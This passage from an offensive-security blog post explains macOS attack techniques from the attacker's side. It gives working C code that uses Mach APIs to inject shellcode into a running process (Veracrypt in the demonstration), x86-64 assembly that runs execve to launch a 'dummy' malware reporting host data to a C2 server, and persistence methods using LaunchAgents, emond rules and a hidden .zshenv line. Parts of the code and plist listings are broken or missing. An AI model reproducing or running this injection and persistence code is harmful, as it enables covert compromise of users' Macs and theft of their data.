    memset(&thread_state, 0, sizeof(thread_state));
    thread_state.__rip = (uint64_t)shellcode_region.addr;
    thread_state.__rsp = (uint64_t)(remote_stack + STACK_SIZE);

    thread_act_t remote_thread;
    kr = thread_create(remote_task, &remote_thread);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to create remote thread: %sn", mach_error_string(kr));
        return -1;

    // Set the thread state
    kr = thread_set_state(remote_thread, x86_THREAD_STATE64, (thread_state_t)&thread_state, x86_THREAD_STATE64_COUNT);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to set thread state: %sn", mach_error_string(kr));
        return -1;

    // Resume the remote thread
    kr = thread_resume(remote_thread);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Failed to resume remote thread: %sn", mach_error_string(kr));
        return -1;

    printf("Shellcode injected successfully!n");

    mach_port_deallocate(mach_task_self(), remote_thread);

    return 0;

To ensure that our shellcode can run, we modify the memory permissions of the allocated memory region containing the shellcode. We use vm_protect to set the appropriate permissions, allowing for execution. Now, it’s time to execute our shellcode. We create a remote thread within the target process using thread_create. This thread will be responsible for running our injected code.

Before we start the thread, we need to set its state. We prepare the thread to execute our shellcode by setting the instruction pointer (rip) to the starting address of the shellcode and the stack pointer (rsp) to the allocated remote stack. Finally, we’re ready to execute our shellcode. We resume the remote thread using thread_resume, allowing it to begin executing the injected code.

If everything goes smoothly, we print a success message indicating that the shellcode was injected successfully. We also clean up any resources used during the injection process by deallocating Mach ports. And that’s it! The entire process of injecting shellcode into a target process on macOS using Mach APIs.

In our injector, we’re injecting shellcode into a target process using Mach APIs in macOS. Now, one significant difference between POSIX threads and Mach threads comes into play here.
POSIX threads utilize the thread local storage (TLS) data structure, which is crucial for managing thread-specific data. However, Mach threads don’t have this concept of TLS.

Now, when we inject our shellcode into the target process and create a remote thread to execute it, we can’t simply point the instruction pointer in the thread context struct and expect everything to work smoothly. Why? Because our shellcode, which is essentially unmanaged code, needs to run in a controlled environment, and transitioning from a Mach thread directly to executing our shellcode might cause issues.

So, to prevent potential crashes or errors, we need to ensure that our shellcode is executed within the context of a fully-fledged POSIX thread. This means that as part of our injection process, we have to somehow promote our shellcode from being executed within the context of a base Mach thread to being executed within the context of a POSIX thread. By doing this, we create a more stable environment for our shellcode to execute, ensuring that when the target process resumes its execution at the start of our shellcode, it does so without any issues. This promotion process is essential for the successful execution of our injected shellcode in user mode without causing crashes or unexpected behavior.

As you can see, we injected our shellcode into the Veracrypt process successfully. The message “Hello World!” was printed, confirming that the shellcode executed as expected and produced the desired output.

However, Let’s shift our focus now. Remember the code we previously developed to transmit system data to the C2 server? What if we inject shellcode into the Veracrypt process to execute our dummy malware, enabling it to establish communication with the C2 server and transmit host data? Alright, so to execute a shell command, considering I’m running zsh, we need to trigger a syscall to run /bin/zsh -c. we need to utilize execve. What does this do? Simply put, it executes the program referenced by _pathname, which in our case will be the dummy malware path.

Alright, again we need to write a simple assembly code to execute /bin/zsh -c '/Users/foo/dummy', first we begin by setting up a register (rbx) and loading the string '/bin/zsh' into it. Once this string is pushed onto the stack, we proceed to load the ASCII values for -c into the lower 16 bits of the rax register. After pushing this -c flag onto the stack, we set the rbx register to point to the -c flag on the stack, as it will be necessary later during the syscall preparation.

Any additional details will be described in comments within the code. At the end of this section, there’s an indirect jump facilitating the execution of subsequent instructions. This jump redirects the program flow to the address stored in the exec subroutine, ensuring the continuity of execution.

global _main

    xor rdx, rdx        ; Clear rdx register
    push rdx            ; Push NULL onto stack (String terminator)
    mov rbx, '/bin/zsh' ; Load '/bin/zsh' into rbx
    push rbx            ; Push '/bin/zsh' onto stack
    mov rdi, rsp        ; Set rdi to point to '/bin/zsh0'
    xor rax, rax        ; Clear rax register
    mov ax, 0x632D      ; Load "-c" into lower 16 bits of rax
    push rax            ; Push "-c" onto stack
    mov rbx, rsp        ; Set rbx to point to "-c"
    push rdx            ; Push NULL onto stack
    jmp short dummy     ; Jump to label dummy

    push rbx            ; Push "-c" onto stack
    push rdi            ; Push '/bin/zsh' onto stack
    mov rsi, rsp        ; Set RSI to point to stack
    push 59             ; Push syscall number
    pop rax             ; Pop syscall number into rax
    bts rax, 25         ; Set 25th bit of rax (AT_FDCWD flag)
    syscall             ; Invoke syscall

    call exec                   ; Call subroutine exec
    db '/Users/foo/dummy_m', 0  ; Define string
    push rdx                    ; Push NULL onto stack

Alright time to try this beauty, As usual, we’ll need to extract the shellcode and test it before using it. As you can see below, we’ve successfully injected our shellcode, triggering our dummy malware. We’re now receiving host information in the C2 server. We can push this further by exploring additional capabilities and attack vectors, But I think that’s enough for now. 🙂

Exec and send host information, basically does nothing to harm your computer “Dummy”; it’s more about showing how malware can be triggered and how it uses injection techniques to spread. It’s also interesting for defensive evasion or adding backdoor capabilities, This was just a quick look at the Mach API, covering system calls and code injection techniques. There’s a lot more to explore beyond what we’ve touched on here, All the code used here can be found at Github

Alright, let’s discuss persistence. It’s a crucial step once we’ve gained initial access and understood the situation. Typically, we aim to establish some form of persistence. We don’t want to rely solely on that initial access point because it could be terminated for various reasons. There might be issues with the user’s computer, or the target could decide to shut everything down. So, it’s important to have a method in place to maintain access to the target.

While there are several persistence techniques for MacOS systems, many of them require root privileges to perform, or exploit some sort of low-level vulnerability to escalate. To keep things simple, let’s focus on Userland Persistence. First, I’ll describe some well-known persistence techniques and some lesser-known ones, so you can understand how these techniques work and how malware can use them. Alright, let’s go :

Before I began writing this article, I analyzed some samples targeting macOS. One commonality among them is that launch agents and launch daemons are by far the most prevalent methods of persistence. Why, you might ask? Well, it’s because of their simplicity and flexibility. You could liken them to the startup folder persistence equivalent on Windows. However, detecting such techniques is relatively easy. Remember when we mentioned LOLBins? Well, think of it as a similarly straightforward and common method, and the detection methods are also well-known.

LaunchAgent & LaunchDaemon

LaunchAgents and LaunchDaemons are key components of macOS, responsible for managing processes automatically. LaunchAgents are typically located in the ~/Library/LaunchAgents directory for user-specific tasks, triggering actions when a user logs in. On the flip side, LaunchDaemons are situated in /Library/LaunchDaemons, initiating tasks upon system startup.

Although LaunchAgents primarily operate within user sessions, they can also be found in system directories like /System/Library/LaunchAgents. However, modifying these files would require disabling System Integrity Protection (SIP), which is not recommended due to potential security risks. In contrast, LaunchDaemons, operating at a system level, require administrator privileges for installation and typically reside in /Library/LaunchDaemons.

Both LaunchAgents and LaunchDaemons are configured using .plist files, specifying commands or referencing executable files for execution.

LaunchAgents are suitable for tasks requiring user interaction, while LaunchDaemons are better suited for background processes. Let’s take a LaunchAgents example:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "">
<plist version="1.0">

So, what does this all mean? Basically, when we want our binary to run every time a user logs onto the system, we just tell launchd to handle it. It’s pretty straightforward, right? But here’s where it gets interesting: there’s something called emond, a command native to macOS located at /sbin/emond. This little tool is quite handy; it accepts events from various services, processes them through a simple rules engine, and takes action accordingly. These actions can involve running commands or performing other tasks.

Now, emond isn’t just any ordinary command. It functions as a regular daemon and is kicked off by launchd every time the operating system starts up. Its configuration file, where we set when and how emond runs, hangs out with the other system daemons at /System/Library/LaunchDaemons/

But how can we use this event monitoring daemon to establish persistence? Well, the mechanics of emond are pretty much like any other LaunchDaemon. It’s launchd’s job to fire up all the LaunchDaemons and LaunchAgents during the boot process. Since emond starts up during boot, if you’re using the _run command_ action, you need to be mindful of what command you’re executing and when during the boot process it’ll happen.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "">
<plist version="1.0">

So, in our SampleRules.plist file, we have a setup called ‘foo’. First off, it waits for 10 seconds after startup. This is done using a command called sleep. Next, we use curl to simply send a DNS query record to verify that it’s actually working, and once the service has started, your event will immediately fire and trigger any actions. emond isn’t a new way to monitor events on macOS, but it’s considered innovative when used for offensive purposes.

Bash Profiles & Zsh Startup

Let’s talk about those bash profiles on Linux systems. They’re essentially scripts containing commands that run whenever you open up a terminal. Now, with macOS Catalina, they’ve switched from using Bash to Z shell as the default. But don’t fret, because you can still achieve the same thing with Z shell.

Instead of bash profiles, Z shell has its own version called start files, which serve the same purpose. But here’s the twist: Z shell also comes with an extra file called the Z shell environment file. This file is more powerful because it kicks in more often, ensuring persistence across different interactions with Z shell.

The cool thing is that even if you just type in a command like zsh -c, this Z shell environment file still gets sourced. This means your persistence setup remains strong, no matter how you’re using Z shell.


~ > cat .zshenv
. "/Users/foo/" > /dev/null 2>&1&

Now, every time you open a terminal and Z shell initializes, it will automatically execute the script, ensuring that your desired commands or actions are performed consistently.

Now, to execute it in the background, we use setopt NO_MONITOR. This command disables job monitoring and then runs the script in the background. As a result, the script runs every time you open a terminal with Z shell, but it runs silently in the background.

So, you get the gist of it, right? These are some of the known techniques I’ve come across, especially in samples. There’s more like Cron jobs, Dock shortcuts, and more,

This was just a basic overview of how easy it is to stick around in a machine. As I mentioned earlier, spotting these tricks isn’t exactly tough, but they can still be a problems. a skilled attacker can get past most security setups with just a simple MSFVenom shellcode. Usually, at this point in the article, I’d start talking about writing a simple malware. But hey, since we’ve already covered code injection pretty extensively, adding more code might just make things drag on and get confusing. So, let’s skip the whole malware-making part for now. We can save that for another article where we can really dive into the whole process. Maybe we’ll even throw macOS rootkit and some other fancy stuff.

In conclusion, Hope that you’ve enjoyed and learned something from this, we’ve covered a broad array of topics related to the OSX architecture and API, though we’ve only scratched the surface. By delving into techniques and writing simple code using the Mach API, we’ve gained a deeper understanding of the environment, its features, and its security. We’ve covered fundamental concepts like code injection and simple persistence techniques, and we’ve even seen macOS syscalls in action through examples, Until next time.

Source: Original Post

“An interesting youtube video that may be related to the article above”